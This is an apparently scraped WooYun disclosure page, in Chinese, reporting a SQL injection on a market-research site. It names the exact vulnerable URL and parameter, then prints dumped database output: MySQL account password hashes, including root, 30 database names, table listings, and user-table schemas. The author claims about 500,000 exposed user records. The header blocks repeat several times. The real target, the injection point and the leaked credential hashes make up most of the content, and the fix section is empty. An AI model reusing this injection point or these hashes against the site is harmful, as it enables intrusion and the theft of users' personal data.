市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

admin

139508
文章

114
评论

2017年4月25日06:38:32评论350 views字数 243阅读0分48秒阅读模式

摘要

2016-04-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-26：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-194624

漏洞标题：市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

漏洞作者： Exploit DB

提交时间： 2016-04-11 09:39

公开时间： 2016-05-26 09:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2016-04-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中国市场调研第一门户网站影响30库

详细说明：

code 区域

http://app.3see.com/job/public/post.php?pid=2960

code 区域

database management system users password hashes:
 [*] 3seeroot [3]:
     password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
     password hash: *DF23C7658CA68A644959B4DE7C7A0E12328F94BD
     password hash: *E30B1F9102F0C1B751E96316EF6C2A859436EC5C
 [*] ailon [1]:
     password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
 [*] cti_fbxt [1]:
     password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
 [*] doosan [1]:
     password hash: *02839BAECB5BEB57BE071190FF2E70701BF66FB1
 [*] fbxt [1]:
     password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
 [*] pureftpd [1]:
     password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF
 [*] root [1]:
     password hash: *2D788DA8CDAE073D0DDB453E628EA003D8CDE85C
 [*] skw [1]:
     password hash: *FC60E807774B9731F82DBC0CDA1159DC6494C95D
 [*] wyt [1]:
     password hash: *64DF5C732B2AD96E34B95E4571C54011D342D7E5

影响30库

code 区域

available databases [30]:
 [*] 3see
 [*] 3seedb
 [*] 3seeforum
 [*] ailon
 [*] air
 [*] bbs
 [*] bbs7vuchome
 [*] blog
 [*] boblog
 [*] cti_fbxt
 [*] discuz
 [*] doosan
 [*] fbxt
 [*] fenghui
 [*] fenghui08
 [*] info
 [*] information_schema
 [*] kstory
 [*] mysql
 [*] mysql__
 [*] new3see
 [*] newyearwork
 [*] pku_bbs
 [*] pureftpd
 [*] reportdata
 [*] sgbbs
 [*] sgblog
 [*] skw_bbs
 [*] skw_member
 [*] space

当前数据库没有多少数据 1000+而已

code 区域

Database: 3see
 +-----------------------+---------+
 | Table                 | Entries |
 +-----------------------+---------+
 | t_makepagelog         | 247155  |
 | cms_data_comment      | 145038  |
 | payreport             | 24432   |
 | cms_data              | 22338   |
 | cms_create_log        | 16043   |
 | cojob_inbox           | 12335   |
 | t_filelog             | 8966    |
 | call_datasheet        | 8525    |
 | myjob_edu             | 6382    |
 | stat_sheet3see        | 6305    |
 | myjob_oldjob          | 6298    |
 | cms_data_picture      | 6271    |
 | myjob_resume          | 5342    |
 | freereports           | 4061    |
 | g_book                | 3821    |
 | myjob_item            | 3250    |
 | media_datasheet       | 2890    |
 | passwordtable         | 2573    |
 | manufacturer_new      | 2498    |
 | manufacturer          | 2192    |
 | cojob_place_new       | 1798    |
 | com_user              | 1348    |
 | members_homepage      | 1331    |
 | en_payreport          | 1210    |
 | com_manufacturer      | 1117    |
 | `3seecojob_coinfo`    | 1112    |
 | m_company             | 1082    |
 | m_user                | 1069    |
 | myjob_favorite        | 968     |
 | bidding               | 773     |
 | manu_art              | 728     |
 | com_homepages         | 715     |
 | com_bidding           | 674     |
 | com_book              | 662     |
 | orders                | 633     |
 | cms_page_module       | 603     |
 | cojob_store           | 558     |
 | myjob_city            | 505     |
 | myjob_letter          | 489     |
 | user_report           | 435     |
 | userdree              | 433     |
 | trainingtable         | 393     |
 | t_log                 | 391     |
 | manu_art_pic          | 366     |
 | pv_stat               | 354     |
 | myjob_search          | 346     |
 | `3seemrarticle`       | 342     |
 | lib_mrarticle         | 321     |
 | mrconews              | 319     |
 | cms_topic_data        | 318     |
 | com_news              | 297     |
 | cojob_place           | 256     |
 | training              | 246     |
 | payreport_co          | 192     |
 | settlement            | 152     |
 | `3seesoftsurveyother` | 141     |
 | newpic                | 124     |
 | company_job           | 123     |
 | diaocha2009           | 115     |
 | myjob_mymsg           | 113     |
 | manu_friends          | 104     |
 | cms_page              | 96      |
 | new_hyclass           | 96      |
 | cms_data_type         | 93      |
 | library_datasheet     | 90      |
 | manufacturer_inform   | 87      |
 | cojob_deptandplace    | 84      |
 | cms_structure         | 80      |
 | t_menu                | 71      |
 | cojob_sessions        | 65      |
 | myjob_posttype        | 63      |
 | inquiry               | 45      |
 | p_commentary          | 45      |
 | ads_aditempic         | 44      |
 | cms_data_file         | 38      |
 | shclass               | 36      |
 | manufacturer_moban    | 34      |
 | training_qy_name      | 33      |
 | ads_aditem            | 32      |
 | advertisement         | 30      |
 | `3seehyclass`         | 29      |
 | adcategory            | 29      |
 | com_hyclass           | 29      |
 | m_admin               | 24      |
 | mrarticleclass        | 24      |
 | uparticle             | 23      |
 | com_uparticle         | 22      |
 | myjob_black           | 20      |
 | cati_literature       | 16      |
 | cms_topic             | 16      |
 | manufacturer_dongtai  | 16      |
 | mrarticle_neikan      | 16      |
 | cms_topic_comment     | 15      |
 | lib_topic             | 14      |
 | training_j            | 14      |
 | anli_down             | 12      |
 | cms_survey_item       | 12      |
 | mrarticle_zazhi       | 12      |
 | t_menuclass           | 12      |
 | t_power               | 12      |
 | trainingclass         | 12      |
 | cms_nextid            | 11      |
 | m_userinfo            | 11      |
 | manufacturer_anli     | 11      |
 | t_user                | 11      |
 | bytuijian             | 10      |
 | orderspayreport       | 10      |
 | ads_class             | 9       |
 | cms_default_module    | 8       |
 | com_seccanli          | 8       |
 | seccanli              | 8       |
 | training_xilie        | 7       |
 | com_anli              | 6       |
 | com_dongtai           | 6       |
 | cms_topic_group_type  | 5       |
 | cati_downloads        | 4       |
 | cati_softintro        | 4       |
 | cati_trends           | 3       |
 | cms_survey_main       | 3       |
 | cms_survey_position   | 3       |
 | manu_floatad          | 3       |
 | manufacturer_mbclass  | 2       |
 | cms_topic_group       | 1       |
 | tex                   | 1       |
 | wytad_count           | 1       |
 +-----------------------+---------+

直接把管理员的表dump all 了吧

看看其他的库

code 区域

Database: 3seedb
 [122 tables]
 +-------------------------+
 | cdb_access              |
 | cdb_activities          |
 | cdb_activityapplies     |
 | cdb_adminactions        |
 | cdb_admincustom         |
 | cdb_admingroups         |
 | cdb_adminnotes          |
 | cdb_adminsessions       |
 | cdb_advcaches           |
 | cdb_advertisements      |
 | cdb_announcements       |
 | cdb_attachments         |
 | cdb_attachpaymentlog    |
 | cdb_attachtypes         |
 | cdb_banned              |
 | cdb_bbcodes             |
 | cdb_caches              |
 | cdb_campaigns           |
 | cdb_creditslog          |
 | cdb_crons               |
 | cdb_debateposts         |
 | cdb_debates             |
 | cdb_failedlogins        |
 | cdb_faqs                |
 | cdb_favorites           |
 | cdb_forumfields         |
 | cdb_forumlinks          |
 | cdb_forumrecommend      |
 | cdb_forums              |
 | cdb_imagetypes          |
 | cdb_invites             |
 | cdb_itempool            |
 | cdb_linkheader          |
 | cdb_magiclog            |
 | cdb_magicmarket         |
 | cdb_magics              |
 | cdb_medallog            |
 | cdb_medals              |
 | cdb_memberfields        |
 | cdb_membermagics        |
 | cdb_members             |
 | cdb_memberspaces        |
 | cdb_moderators          |
 | cdb_modworks            |
 | cdb_myposts             |
 | cdb_mytasks             |
 | cdb_mythreads           |
 | cdb_navs                |
 | cdb_onlinelist          |
 | cdb_onlinetime          |
 | cdb_orders              |
 | cdb_paymentlog          |
 | cdb_pluginhooks         |
 | cdb_plugins             |
 | cdb_pluginvars          |
 | cdb_polloptions         |
 | cdb_polls               |
 | cdb_posts               |
 | cdb_profilefields       |
 | cdb_projects            |
 | cdb_promotions          |
 | cdb_ranks               |
 | cdb_ratelog             |
 | cdb_regips              |
 | cdb_relatedthreads      |
 | cdb_reportlog           |
 | cdb_request             |
 | cdb_rewardlog           |
 | cdb_rsscaches           |
 | cdb_searchindex         |
 | cdb_sessions            |
 | cdb_settings            |
 | cdb_smilies             |
 | cdb_spacecaches         |
 | cdb_stats               |
 | cdb_statvars            |
 | cdb_styles              |
 | cdb_stylevars           |
 | cdb_subscriptions       |
 | cdb_tags                |
 | cdb_tasks               |
 | cdb_taskvars            |
 | cdb_templates           |
 | cdb_threads             |
 | cdb_threadsmod          |
 | cdb_threadtags          |
 | cdb_threadtypes         |
 | cdb_tradecomments       |
 | cdb_tradelog            |
 | cdb_tradeoptionvars     |
 | cdb_trades              |
 | cdb_typemodels          |
 | cdb_typeoptions         |
 | cdb_typeoptionvars      |
 | cdb_typevars            |
 | cdb_uc_admins           |
 | cdb_uc_applications     |
 | cdb_uc_badwords         |
 | cdb_uc_domains          |
 | cdb_uc_failedlogins     |
 | cdb_uc_feeds            |
 | cdb_uc_friends          |
 | cdb_uc_mailqueue        |
 | cdb_uc_memberfields     |
 | cdb_uc_members          |
 | cdb_uc_mergemembers     |
 | cdb_uc_newpm            |
 | cdb_uc_notelist         |
 | cdb_uc_pms              |
 | cdb_uc_protectedmembers |
 | cdb_uc_settings         |
 | cdb_uc_sqlcache         |
 | cdb_uc_tags             |
 | cdb_uc_vars             |
 | cdb_usergroups          |
 | cdb_validating          |
 | cdb_videos              |
 | cdb_videotags           |
 | cdb_virtualforums       |
 | cdb_warnings            |
 | cdb_words               |
 | textt                   |
 +-------------------------+

39W+用户信息

code 区域

Database: 3seedb
 Table: cdb_uc_members
 [12 columns]
 +---------------+-----------------------+
 | Column        | Type                  |
 +---------------+-----------------------+
 | email         | char(32)              |
 | lastloginip   | int(10)               |
 | lastlogintime | int(10) unsigned      |
 | myid          | char(30)              |
 | myidkey       | char(16)              |
 | password      | char(32)              |
 | regdate       | int(10) unsigned      |
 | regip         | char(15)              |
 | salt          | char(6)               |
 | secques       | char(8)               |
 | uid           | mediumint(8) unsigned |
 | username      | char(15)              |
 +---------------+-----------------------+
 
 Database: 3seedb
 Table: cdb_members
 [48 columns]
 +---------------+-----------------------+
 | Column        | Type                  |
 +---------------+-----------------------+
 | accessmasks   | tinyint(1)            |
 | adminid       | tinyint(1)            |
 | avatarshowid  | int(10) unsigned      |
 | bday          | date                  |
 | credits       | int(10)               |
 | customaddfeed | tinyint(1)            |
 | customshow    | tinyint(1) unsigned   |
 | dateformat    | tinyint(1)            |
 | digestposts   | smallint(6) unsigned  |
 | editormode    | tinyint(1) unsigned   |
 | email         | char(40)              |
 | extcredits1   | int(10)               |
 | extcredits2   | int(10)               |
 | extcredits3   | int(10)               |
 | extcredits4   | int(10)               |
 | extcredits5   | int(10)               |
 | extcredits6   | int(10)               |
 | extcredits7   | int(10)               |
 | extcredits8   | int(10)               |
 | extgroupids   | char(20)              |
 | gender        | tinyint(1)            |
 | groupexpiry   | int(10) unsigned      |
 | groupid       | smallint(6) unsigned  |
 | invisible     | tinyint(1)            |
 | lastactivity  | int(10) unsigned      |
 | lastip        | char(15)              |
 | lastpost      | int(10) unsigned      |
 | lastvisit     | int(10) unsigned      |
 | newsletter    | tinyint(1)            |
 | oltime        | smallint(6) unsigned  |
 | pageviews     | mediumint(8) unsigned |
 | password      | char(32)              |
 | pmsound       | tinyint(1)            |
 | posts         | mediumint(8) unsigned |
 | ppp           | tinyint(3) unsigned   |
 | prompt        | tinyint(1)            |
 | regdate       | int(10) unsigned      |
 | regip         | char(15)              |
 | secques       | char(8)               |
 | showemail     | tinyint(1)            |
 | sigstatus     | tinyint(1)            |
 | styleid       | smallint(6) unsigned  |
 | timeformat    | tinyint(1)            |
 | timeoffset    | char(4)               |
 | tpp           | tinyint(3) unsigned   |
 | uid           | mediumint(8) unsigned |
 | username      | char(15)              |
 | xspacestatus  | tinyint(1)            |
 +---------------+-----------------------+

code 区域

Database: discuz
 [53 tables]
 +--------------------+
 | cdb_access         |
 | cdb_adminactions   |
 | cdb_admingroups    |
 | cdb_adminnotes     |
 | cdb_adminsessions  |
 | cdb_advertisements |
 | cdb_announcements  |
 | cdb_attachments    |
 | cdb_attachtypes    |
 | cdb_banned         |
 | cdb_bbcodes        |
 | cdb_blogcaches     |
 | cdb_buddys         |
 | cdb_creditslog     |
 | cdb_failedlogins   |
 | cdb_favorites      |
 | cdb_forumfields    |
 | cdb_forumlinks     |
 | cdb_forums         |
 | cdb_medals         |
 | cdb_memberfields   |
 | cdb_members        |
 | cdb_moderators     |
 | cdb_onlinelist     |
 | cdb_onlinetime     |
 | cdb_orders         |
 | cdb_paymentlog     |
 | cdb_plugins        |
 | cdb_pluginvars     |
 | cdb_pms            |
 | cdb_polls          |
 | cdb_posts          |
 | cdb_profilefields  |
 | cdb_ranks          |
 | cdb_ratelog        |
 | cdb_regips         |
 | cdb_rsscaches      |
 | cdb_searchindex    |
 | cdb_sessions       |
 | cdb_settings       |
 | cdb_smilies        |
 | cdb_stats          |
 | cdb_statvars       |
 | cdb_styles         |
 | cdb_stylevars      |
 | cdb_subscriptions  |
 | cdb_templates      |
 | cdb_threads        |
 | cdb_threadsmod     |
 | cdb_threadtypes    |
 | cdb_usergroups     |
 | cdb_validating     |
 | cdb_words          |
 +--------------------+

9W+用户信息

code 区域

Database: bbs
 +------------------+---------+
 | Table            | Entries |
 +------------------+---------+
 | cdb_posts        | 8084    |
 | cdb_threads      | 7461    |
 | cdb_spacecaches  | 2708    |
 | cdb_memberfields | 543     |
 | cdb_members      | 543     |
 | cdb_memberspaces | 542     |
 | cdb_rsscaches    | 461     |
 | cdb_myposts      | 258     |
 | cdb_settings     | 221     |
 | cdb_mythreads    | 126     |
 | cdb_statvars     | 75      |
 | cdb_stylevars    | 52      |
 | cdb_stats        | 50      |
 | cdb_faqs         | 34      |
 | cdb_forumfields  | 30      |
 | cdb_forums       | 29      |
 | cdb_smilies      | 29      |
 | cdb_usergroups   | 16      |
 | cdb_crons        | 13      |
 | cdb_magics       | 12      |
 | cdb_projects     | 11      |
 | cdb_medals       | 10      |
 | cdb_bbcodes      | 7       |
 | cdb_onlinetime   | 7       |
 | cdb_ranks        | 5       |
 | cdb_onlinelist   | 4       |
 | cdb_admingroups  | 3       |
 | cdb_failedlogins | 1       |
 | cdb_forumlinks   | 1       |
 | cdb_styles       | 1       |
 | cdb_templates    | 1       |
 +------------------+---------+

这里也有部分用户信息

全部加起来应该有50W了

漏洞证明：

修复方案：

版权声明：转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

漏洞概要关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-194624

漏洞标题：市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

相关厂商：市场研究信息网

漏洞作者： Exploit DB

提交时间： 2016-04-11 09:39

公开时间： 2016-05-26 09:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-194624

漏洞标题： 市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

相关厂商： 市场研究信息网

漏洞作者： Exploit DB

提交时间： 2016-04-11 09:39

公开时间： 2016-05-26 09:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(1) 关注此漏洞

漏洞标题：市场信息研究网主站SQL注入至整站50W+用户信息泄露(ROOT+可union跨库查询)

相关厂商：市场研究信息网

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分